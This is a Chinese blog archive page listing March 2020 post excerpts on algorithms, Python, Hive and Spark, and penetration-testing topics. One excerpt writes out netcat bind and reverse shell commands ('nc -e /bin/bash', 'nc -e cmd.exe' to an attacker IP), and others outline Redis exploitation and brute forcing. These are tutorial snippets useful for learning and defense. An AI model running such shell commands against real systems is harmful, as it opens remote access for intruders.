03 2020 档案

摘要:https://www.cnblogs.com/bonelee/p/11924605.html模板:前缀和,包括一维和二维树状数组:随缘吧cnblogs.com/bonelee/p/11926181.html模板:二路归并,k路归并(含用q),区间合并 阅读全文
posted @ 2020-03-28 20:03 bonelee 阅读(270) 评论(0) 推荐(0) 编辑
摘要:https://blog.csdn.net/qq_19446965/article/details/102982047 动态维护中位数一般都是用双堆解决 – 同理:动态维护第K大数 295. 数据流的中位数 难度困难800收藏分享切换为英文接收动态反馈 中位数是有序整数列表中的中间值。如果列表的大小 阅读全文
posted @ 2020-03-28 20:01 bonelee 阅读(306) 评论(0) 推荐(0) 编辑
摘要:https://www.cnblogs.com/bonelee/p/11789330.html 5个模板 """ def hasCycle(self, head): # write your code here slow, fast = head, head while fast and fast. 阅读全文
posted @ 2020-03-28 19:58 bonelee 阅读(306) 评论(0) 推荐(0) 编辑
摘要:课程安排 知识点题目+1题目+2日期 线性数据结构 - 数组 15.三数之和 560. 和为K的子数组 11. 盛最多水的容器 排序算法 179. 最大数 75. 颜色分类 1054. 距离相等的条形码 扩展线性数据结构 - 多维数组 986. 区间列表的交集 56. 合并区间 74. 搜索二维矩阵 阅读全文
posted @ 2020-03-28 19:56 bonelee 阅读(243) 评论(0) 推荐(0) 编辑
摘要:给定一个数组arr(无序),其中每个元素值可为正数、负数和0,再给定一个正数k。求arr中所有连续子数组元素累加和为k的最长子数组长度。【难度:高】 示例: 输入: [2,1,-3,4,-1,2,-1,-2,4, -2,2,-2], k = 2 输出: 11 解释: 和为 2的最长连续子数组 [1, 阅读全文
posted @ 2020-03-28 19:55 bonelee 阅读(413) 评论(0) 推荐(0) 编辑
摘要:二分法模板 链接:https://blog.csdn.net/qq_19446965/article/details/82184672 • 循环条件到底哪一个? • start <= end • start < end • start + 1 < end • 指针变换到底哪一个 • start = 阅读全文
posted @ 2020-03-28 19:54 bonelee 阅读(389) 评论(0) 推荐(0) 编辑
摘要:dp类题目总结(双序列和背包问题): 1、双序列题目 最长回文子串 最长公共子序列(diff实现) 编辑距离 交叉字符串 特点:(1)单字符串dp,用二维dp,i,j表示s[i:j+1](2)双字符串 的,dp[i][j]表示s1[:i]和s2[:j]推导s1[i] s2[j]关系 2、背包类DP 阅读全文
posted @ 2020-03-28 19:51 bonelee 阅读(418) 评论(0) 推荐(0) 编辑
摘要:974. 和可被 K 整除的子数组 难度中等51收藏分享切换为英文关注反馈 给定一个整数数组 A,返回其中元素之和可被 K 整除的(连续、非空)子数组的数目。 示例: 输入:A = [4,5,0,-2,-3,1], K = 5 输出:7 解释: 有 7 个子数组满足其元素之和可被 K = 5 整除: 阅读全文
posted @ 2020-03-27 20:13 bonelee 阅读(406) 评论(0) 推荐(0) 编辑
摘要:Trie(前缀树) 的模板应用. 维基百科: https://zh.wikipedia.org/zh-hans/Trie 使用下面的模板:dfs_search是通过按键搜索有效 单词的题。 from collections import defaultdict class Trie: def __i 阅读全文
posted @ 2020-03-27 19:27 bonelee 阅读(483) 评论(1) 推荐(0) 编辑
摘要:204. 计数质数 难度简单311收藏分享切换为英文关注反馈 统计所有小于非负整数 n 的质数的数量。 示例: 输入: 10 输出: 4 解释: 小于 10 的质数一共有 4 个, 它们是 2, 3, 5, 7 。 class Solution(object): def countPrimes(se 阅读全文
posted @ 2020-03-27 18:23 bonelee 阅读(398) 评论(0) 推荐(0) 编辑
摘要:Python深入06 Python的内存管理 作者:Vamei 出处:http://www.cnblogs.com/vamei 欢迎转载,也请保留这段声明。谢谢! 语言的内存管理是语言设计的一个重要方面。它是决定语言性能的重要因素。无论是C语言的手工管理,还是Java的垃圾回收,都成为语言最重要的特 阅读全文
posted @ 2020-03-25 16:34 bonelee 阅读(904) 评论(0) 推荐(0) 编辑
摘要:谈一谈 python 中 del 的用法 0.3362018.07.19 20:55:26字数 211阅读 15,122 del涉及到python中的内存管理机制,从c/c++转过来的同学可能会踩一些语法坑,下面上一些代码及运行结果,谈谈今天要讲的问题,后面再解释具体原理机制。 a = 1 b = 阅读全文
posted @ 2020-03-25 16:26 bonelee 阅读(548) 评论(0) 推荐(0) 编辑
摘要:for循环中的lambda与闭包 问题引入 z = [lambda x:x*i for i in range(3)] x = [o(2) for o in z] print x # [4,4,4] f = [lambda x: x*i for i in range(3)](与x无关) i就是在闭包作 阅读全文
posted @ 2020-03-25 16:07 bonelee 阅读(1187) 评论(0) 推荐(1) 编辑
摘要:Python-try except else finally有return时执行顺序探究 下面这段代码: def calculate(division): try: return 100/division except ZeroDivisionError as e: print("fuck") ra 阅读全文
posted @ 2020-03-25 15:34 bonelee 阅读(689) 评论(0) 推荐(0) 编辑
摘要:你所不知道的Python | 字符串连接的秘密 ​ from:https://zhuanlan.zhihu.com/p/38632822 字符串连接,就是将2个或以上的字符串合并成一个,看上去连接字符串是一个非常基础的小问题,但是在Python中,我们可以用多种方式实现字符串的连接,稍有不慎就有可能 阅读全文
posted @ 2020-03-25 15:07 bonelee 阅读(923) 评论(0) 推荐(0) 编辑
摘要:十大经典排序算法(动图演示) 0、算法概述 0.1 算法分类 十种常见排序算法可以分为两大类: 比较类排序:通过比较来决定元素间的相对次序,由于其时间复杂度不能突破O(nlogn),因此也称为非线性时间比较类排序。 非比较类排序:不通过比较来决定元素间的相对次序,它可以突破基于比较排序的时间下界,以 阅读全文
posted @ 2020-03-25 15:04 bonelee 阅读(650) 评论(0) 推荐(0) 编辑
摘要:HashTable-散列表/哈希表 是根据关键字(key)而直接访问在内存存储位置的数据结构。 它通过一个关键值的函数将所需的数据映射到表中的位置来访问数据,这个映射函数叫做散列(哈希)函数,存放记录的数组叫做散列表。 构造哈希表的几种方法1.直接定址法(取关键字的某个线性函数为哈希地址)2.除留余 阅读全文
posted @ 2020-03-25 14:55 bonelee 阅读(1409) 评论(0) 推荐(0) 编辑
摘要:转自https://blog.csdn.net/weixin_42229896/article/details/80736517 假脱机的概念 SPOOLing技术:利用高速共享设备(通常是磁鼓或者是磁带)将低速的独享设备模拟为高速的共享设备,这样,从逻辑上讲,计算机系统为每一个用户都分配了一台独立 阅读全文
posted @ 2020-03-25 14:35 bonelee 阅读(1031) 评论(0) 推荐(0) 编辑
摘要:622. 设计循环队列 难度中等89收藏分享切换为英文关注反馈 设计你的循环队列实现。 循环队列是一种线性数据结构,其操作表现基于 FIFO(先进先出)原则并且队尾被连接在队首之后以形成一个循环。它也被称为“环形缓冲器”。 循环队列的一个好处是我们可以利用这个队列之前用过的空间。在一个普通队列里,一 阅读全文
posted @ 2020-03-22 13:09 bonelee 阅读(466) 评论(0) 推荐(0) 编辑
摘要:使用ew完成多场景下内网代理穿透 日期 2019-04-20 基础,内网渗透,代理穿透,端口转发 作者 amm907 共0评论 0x01 需求 当渗透进行到内网,常需要将流量代理到内网进行进一步扩展如: 端口扫描 端口转发 访问内网web服务 …… 0x02 场景 以下模拟一个使用场景。 1、环境配 阅读全文
posted @ 2020-03-17 15:43 bonelee 阅读(3235) 评论(0) 推荐(0) 编辑
摘要:内网渗透中的端口转发 需要知道,在渗透的整个流程中,根据web应用或者开放的端口进行渗透,获取webshell只是渗透这门艺术的一小部分,在真实的错综复杂的企业环境中进行内网渗透,其实水很深,涉及内网穿透,端口转发,域渗透,提权等一系列的难题。所以这篇文章对内网渗透学习进行一些记录。在这过程中参考了 阅读全文
posted @ 2020-03-17 15:34 bonelee 阅读(8129) 评论(0) 推荐(2) 编辑
摘要:内网渗透常见端口转发方式 Feb 2, 2018 本篇文章主要是总结一下常见端口转发姿势。 0x01 前言 网络拓扑 0x02 lcx lcx 参数 端口映射 - 无法访问内网情况下 端口转发 - 能够访问内网某台主机 0x03 netsh 说明 安装IPV6 转发 删除转发记录 查看转发记录 0x 阅读全文
posted @ 2020-03-17 15:32 bonelee 阅读(1249) 评论(0) 推荐(0) 编辑
摘要:内网渗透之端口转发、映射、代理 裁决 / 2019-09-18 09:22:14 / 浏览数 13714 渗透测试 渗透测试顶(7) 踩(0) 端口转发&端口映射 0x01 什么是端口转发 端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH)为网络安全通信使用的一种方法。端 阅读全文
posted @ 2020-03-17 09:48 bonelee 阅读(4100) 评论(0) 推荐(0) 编辑
摘要:内网渗透的边界场景分析+内网代理整理 先从nc开始理解正向代理和反向代理: 1、正向连接 受害者主机执行 nc -e -t /bin/bash -lvp 7777 攻击者执行 nc -t 192.168.16.X 7777 2、反向连接 受害者主机执行 nc -t -e cmd.exe 192.16 阅读全文
posted @ 2020-03-16 22:34 bonelee 阅读(3514) 评论(0) 推荐(0) 编辑
摘要:未授权访问漏洞总结 karlbrain 2019-07-27 共282627人围观 ,发现 1 个不明物体 WEB安全 *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面 阅读全文
posted @ 2020-03-15 21:13 bonelee 阅读(644) 评论(0) 推荐(0) 编辑
摘要:未授权访问漏洞总结 2017年09月30日 漏洞分析 目录 前言 0x01 介绍 0x02 Redis未授权访问 2.1 漏洞描述 2.2 漏洞利用 1、利用计划任务执行命令反弹shell 2、写 ssh-keygen 公钥登录服务器 3、获取 web 服务的 webshell 2.3 漏洞加固 0 阅读全文
posted @ 2020-03-15 21:10 bonelee 阅读(1572) 评论(0) 推荐(0) 编辑
摘要:功能 名称描述 Web攻击防护 抵御各类Web应用攻击,如SQL注入、命令执行、XSS等。 CC安全防护 独家算法防护引擎、结合大数据、秒级拦截机器恶意CC攻击。 精准访问控制(黑白名单) 针对性地拦截或放行某次访问。 高频Web攻击IP自动封禁 自动封禁在短时间内进行多次Web攻击的客户端IP。 阅读全文
posted @ 2020-03-15 20:58 bonelee 阅读(994) 评论(0) 推荐(0) 编辑
摘要:防敏感信息泄漏是Web应用防火墙针对网安法提出的“网络运营者应当采取技术措施和其他必要措施,确保其收集的个人信息安全,防止信息泄露、毁损、丢失。在发生或者可能发生个人信息泄露、毁损、丢失的情况时,应当立即采取补救措施,按照规定及时告知用户并向有关主管部门报告”所给出的安全防护方案。 前提条件 说明  阅读全文
posted @ 2020-03-15 20:56 bonelee 阅读(1263) 评论(1) 推荐(0) 编辑
摘要:服务器除了以上提到的那些大名鼎鼎的漏洞和臭名昭著的攻击以外,其实还有很多其他的漏洞,往往也很容易被忽视,在这个小节也稍微介绍几种。 越权操作漏洞 如果你的系统是有登录控制的,那就要格外小心了,因为很有可能你的系统越权操作漏洞,越权操作漏洞可以简单的总结为 「A 用户能看到或者操作 B 用户的隐私内容 阅读全文
posted @ 2020-03-15 20:45 bonelee 阅读(3112) 评论(0) 推荐(0) 编辑
摘要:WEB应用中的信息泄漏以及攻击方法 下面内容介绍了在web应用程序中的一些信息泄漏问题,当然也会举例分析,介绍如何发现这些信息泄漏。 Banner收集/主动侦查 Banner收集或主动侦察是一种攻击类型,攻击者在此期间向他们的目标系统发送请求,以收集有关它的更多信息。如果系统配置不当,可能会泄漏自己 阅读全文
posted @ 2020-03-15 20:39 bonelee 阅读(1616) 评论(0) 推荐(0) 编辑
摘要:一种数据库拖库行为的检测方法、装置及电子设备制造方法及图纸 技术编号:22076518阅读:181留言:0更新日期:2019-09-12 14:24 本发明专利技术实施例提供了一种数据库拖库行为的检测方法、装置及电子设备。首先,获取待检测数据库的审计日志;从审计日志中,获取用户对待检测数据库的操作行 阅读全文
posted @ 2020-03-15 18:21 bonelee 阅读(793) 评论(0) 推荐(0) 编辑
摘要:拖库检测与数据安全 OpenRASP 是百度安全推出的一款开源、免费的自适应安全产品,目前与国际知名非盈利安全组织 OWASP(Open Web Application Security Project)达成深度合作,现已加入到OWASP全球技术项目中,将在全球范围内进行大规模推广。OpenRASP 阅读全文
posted @ 2020-03-15 18:18 bonelee 阅读(304) 评论(0) 推荐(0) 编辑
摘要:文档首页 > 数据库安全服务 DBSS > 用户指南> 数据库安全防护使用指导> 数据库防拖库> 创建或编辑防拖库规则 创建或编辑防拖库规则 HexaTier提供配置数据库防拖库规则和查看防拖库事件日志功能。用户设置针对指定表的防拖库规则后,在数据库用户、源IP地址和应用操作该表中的大量数据并超过规 阅读全文
posted @ 2020-03-15 18:10 bonelee 阅读(613) 评论(0) 推荐(0) 编辑
摘要:Burpsuite抓取https包 浏览器代理设置 Burpsuite代理设置 启动Burpsuite,浏览器访问127.0.0.1:8080,点击CA Certificate,下载cacert.der安全证书文件。 导入证书:Internet选项,内容,证书,选择受信任的证书颁发机构,导入刚刚下载 阅读全文
posted @ 2020-03-15 17:32 bonelee 阅读(4062) 评论(0) 推荐(0) 编辑
摘要:Burp Suite抓HTTPS数据包(通用) 测试环境 [+] JDK1.8.0_40 [+] Burp Suite 1.6.17 下载地址: [+] JDK [+] Burp Suite 1.6.17 一、burp介绍 请自行参阅https://portswigger.net/burp/ 这里不 阅读全文
posted @ 2020-03-15 17:31 bonelee 阅读(3597) 评论(1) 推荐(1) 编辑
摘要:暴力破解常见服务以及工具的使用 from:https://cloud.tencent.com/developer/article/1526139 最近想写一篇关于暴力破解相关的文章,本人有写博客的习惯,都是随便写写,以便以后自己回忆知识点。 暴力破解:暴力破解的原理就是使用攻击者自己的用户名和密码字 阅读全文
posted @ 2020-03-15 17:13 bonelee 阅读(12181) 评论(0) 推荐(0) 编辑
摘要:Web暴力破解--前端JS表单加密进行爆破 0x01 前言 常见的js实现加密的方式有:md5、base64、shal,写了一个简单的demo作为测试。 0x02 代码 login.html <!DOCTYPE HTML> <html> <head> <meta charset="utf-8"> < 阅读全文
posted @ 2020-03-15 12:33 bonelee 阅读(3302) 评论(0) 推荐(0) 编辑
摘要:Web攻防之暴力破解(何足道版) 原创 sm0nk 猎户攻防实验室 2017-11-28 0x00 @序 攻防之初,大多为绕过既有逻辑和认证,以Getshell为节点,不管是SQL注入获得管理员数据还是XSS 获得后台cookie,大多数是为了后台的登录权限,假若我们获得一枚口令,都是柳暗花明。不管 阅读全文
posted @ 2020-03-15 12:30 bonelee 阅读(1649) 评论(0) 推荐(0) 编辑
摘要:ctf训练 web安全暴力破解原创野九 最后发布于2019-06-16 22:19:53 阅读数 457 收藏展开此次的方法叫做穷举法,也成为枚举法。就是把可能问题一一列举出来。 第一步同样是信息探测(包括敏感信息的探测)信息探测这次只说一下信息探测的以往的语法: 扫描主机服务信息以及服务版本nma 阅读全文
posted @ 2020-03-15 12:14 bonelee 阅读(1104) 评论(0) 推荐(0) 编辑
摘要:暴力破解及其流行工具研究 大学新生Bai2019-02-25+6共274760人围观 ,发现 10 个不明物体工具网络安全 暴力破解是最流行的密码破解方法之一,然而,它不仅仅是密码破解。暴力破解还可用于发现Web应用程序中的隐藏页面和内容,在你成功之前,这种破解基本上是“破解一次尝试一次”。这种破解 阅读全文
posted @ 2020-03-15 12:07 bonelee 阅读(1979) 评论(0) 推荐(0) 编辑
摘要:写在前面的话 在很多现实的攻击案例中,大多数攻击者都是通过暴力破解的方式来入侵目标系统的,此时攻击者主要利用的是弱密码以及密码管理方面的安全问题。Web应用和Web服务特别容易受到密码暴力破解攻击,因为它们相对来说比较容易实现远程访问,而且数量和种类都非常丰富。在这篇文章中,我们将站在攻击者的角度跟 阅读全文
posted @ 2020-03-15 12:02 bonelee 阅读(798) 评论(0) 推荐(0) 编辑
摘要:今天小编给大家演示Web渗透中最简单的暴力破解,今天我们要用到的工具是burpsuite对用户账号密码进行暴力破解,首先声明,此文章仅用于教学,大家不要在未经许可的情况下对别人的网站使用暴力破解,这时违法行为,自己写个网站试就好——实战篇 1.首先我们打开burpsuite这款软件: 2.然后打开我 阅读全文
posted @ 2020-03-15 11:46 bonelee 阅读(1961) 评论(1) 推荐(0) 编辑
摘要:都是 HBase 上的 SQL 引擎,Kylin 和 Phoenix 有什么不同? from:https://www.jianshu.com/p/5d98cf84f6e7 大数据时代,数据的价值越来越被重视,企业从海量大数据中挖掘所需要的信息,用来驱动业务决策以获得更大的商业价值。 与此同时,出现了 阅读全文
posted @ 2020-03-08 15:53 bonelee 阅读(480) 评论(0) 推荐(0) 编辑
摘要:一、spark SQL概述 1.1 什么是spark SQL ​ Spark SQL是Spark用来处理结构化数据的一个模块,它提供了一个编程抽象叫做DataFrame并且作为分布式SQL查询引擎的作用。类似于hive的作用。 1.2 spark SQL的特点 1、容易集成:安装Spark的时候,已 阅读全文
posted @ 2020-03-08 15:41 bonelee 阅读(4535) 评论(0) 推荐(1) 编辑
摘要:from:https://blog.csdn.net/zhanglh046/article/details/78505038 一 Spark SQL运行架构Spark SQL对SQL语句的处理和关系型数据库类似,即词法/语法解析、绑定、优化、执行。Spark SQL会先将SQL语句解析成一棵树,然后 阅读全文
posted @ 2020-03-08 15:31 bonelee 阅读(816) 评论(0) 推荐(0) 编辑
摘要:Hive架构和工作原理 from:https://cloud.tencent.com/developer/news/362488 一、Hive 架构 下面是Hive的架构图。 Hive的体系结构可以分为以下几部分: 1、用户接口主要有三个:CLI,Client 和 WUI。其中最常用的是CLI,Cl 阅读全文
posted @ 2020-03-08 12:01 bonelee 阅读(3643) 评论(0) 推荐(0) 编辑
摘要:一文弄懂Hive基本架构和原理from:https://blog.csdn.net/oTengYue/article/details/91129850文章目录 概述 Hive架构 Hive数据模型 Hive SQL的编译 Hive执行计划 Hive Sql的MapReduce实现原理 Join的实现 阅读全文
posted @ 2020-03-08 11:52 bonelee 阅读(1884) 评论(0) 推荐(0) 编辑
摘要:应届生小祖参加了个需求分析会回来后跟我说被产品怼了一句: "不就是写SQL吗,要那么久吗" 我去,欺负我小弟,这我肯定不能忍呀,于是我写了一篇文章发在了公司的wiki: 贴出来给大家看看,省略了一些敏感的内容。 当然内部版言辞也会温和一点,嘻嘻 在哪里写SQL? 这个问题高级点的问法是用哪种SQL引 阅读全文
posted @ 2020-03-08 11:32 bonelee 阅读(681) 评论(0) 推荐(0) 编辑
摘要:大数据 “数据倾斜”的问题 大数据首席数据师 0.7862018.11.13 11:21:28字数 897阅读 4,411 一、Hadoop中的数据倾斜: 什么是数据倾斜?(见下图) 简单来说数据倾斜就是数据的key 的分化严重不均,造成一部分数据很多,一部分数据很少的局面。 举个 word cou 阅读全文
posted @ 2020-03-08 11:27 bonelee 阅读(661) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示